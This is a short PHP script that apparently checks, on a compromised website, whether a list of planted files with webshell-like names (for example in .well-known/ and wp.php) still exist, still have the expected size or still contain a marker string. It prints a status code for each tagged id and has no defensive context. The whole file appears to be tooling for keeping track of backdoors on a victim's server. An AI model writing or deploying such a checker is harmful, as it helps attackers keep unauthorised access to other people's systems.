﻿<?php   $r = '/home/tricehdo/partar.in'; $x = ["/cloud.php"=>"bd@@244410178@@1125",
"/File_dm.php"=>"bd@@244410182@@1159",
"/style.php"=>"bd@@244410203@@827",
"/param.php"=>"bd@@244442736@@29",
"/.well-known/edit.test.php"=>"bd@@244443304@@1610",
"/.well-known/edit.test.php"=>"bd@@244458907@@97",
"/.well-known/CAPTCHA.event.php"=>"bd@@244459309@@20",
"/540189.php"=>"bd@@244410170@@1203",
"/.well-known/CAPTCHA_test.php"=>"bd@@244460548@@83",
"/wp.php"=>"bd@@244460951@@68",
"/cloud.php"=>"bd@@244461039@@batch_process",
"/assignment.php"=>"bd@@244461157@@1658",
"/540189.php"=>"bd@@244475243@@reverse_searcher",
"/.well-known/edit.event.php"=>"bd@@244475564@@service_registry",
"/param.php"=>"bd@@244410195@@2029"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 